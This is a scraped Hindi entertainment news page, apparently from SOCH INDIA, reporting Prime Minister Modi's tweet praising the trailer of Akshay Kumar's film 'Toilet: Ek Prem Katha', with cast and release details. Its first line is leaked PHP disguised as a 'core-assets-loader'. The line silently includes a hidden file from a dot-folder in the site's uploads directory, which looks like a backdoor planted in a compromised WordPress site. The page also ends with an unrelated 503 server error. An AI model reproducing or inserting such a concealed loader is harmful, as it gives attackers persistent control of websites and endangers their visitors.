add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); एक प्रेम कथा’ की तारीफ, जानें ट्वीट कर क्या कहा? – SOCH INDIA
Menu

मनोरंजन
एक प्रेम कथा’ की तारीफ, जानें ट्वीट कर क्या कहा?

nobanner

बॉलीवुड अभिनेता अक्षय कुमार के आने वाली फिल्म’टॉयलेट: एक प्रेम कथा’ का ट्रेलर रिलीज हो गया है. प्रधानमंत्री नरेंद्र मोदी ने ट्वीट कर इस फिल्म की तारीफ की है. अक्षय कुमार ने पीएम मोदी को टैग करके अपनी फिल्म के ट्रेलर को ट्वीट किया था.

पीएम मोदी ने ट्वीट कर लिखा है, ‘’स्वच्छता के संदेश को आगे बढ़ाने में यह एक अच्छी कोशिश है. स्वच्छ भारत के लिए 125 करोड़ भारतीयों को काम जारी रखना होगा.’

कहा जा रहा है कि फिल्म स्वच्छ भारत अभियान पर आधारित है. फिल्म शौचालय को घर-घर पहुंचाने के संदेश पर बनी है. फिल्म में यह मैसेज देने की कोशिश की गई है कि आखिर क्यों घर में शौचालय की जरूरत सबसे ज्यादा है.

हाल ही में अक्षय कुमार पीएम मोदी से मिलने पहुंचे थे और उन्होंने अपनी फिल्म को लेकर पीएम से बात भी की थी.

पीएम मोदी के साथ अक्षय ने ट्विटर पर एक तस्वीर शेयर कर लिखा था, “प्रधानमंत्री नरेंद्र मोदी से मुलाकात की और अपनी आगामी फिल्म ‘टॉयलेट : एक प्रेम कथा’ के बारे बताने का मौका मिला. उनकी मुस्कान ने मेरा दिन बना दिया.”

प्रधानमंत्री ने अक्षय के जवाब में कहा था, ‘‘मिलकर खुशी हुई. मेरी शुभकामनाएं.’’ इसके बाद अक्षय ने लिखा, ‘‘ बहुत बहुत धन्यवाद, सर. वास्तव में यह काफी अच्छा रहा.’’

इस फिल्म में अक्षय कुमार और भूमि पेडनेकर ने मुख्य किरदार निभाया है. अक्षय, भूमि के अलावा फिल्म में दिवेंदु शर्मा, सुधीर पांडे, शोभा खोटे और अनुपम खेर महत्वपुर्ण भूमिका में हैं. फिल्म के निर्देशक नारायण सिंह हैं. वहीं, नीरज पांडेय और अक्षय कुमार इसके प्रोड्यूसर हैं. फिल्म 11 अगस्त 2017 को रिलीज होगी.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.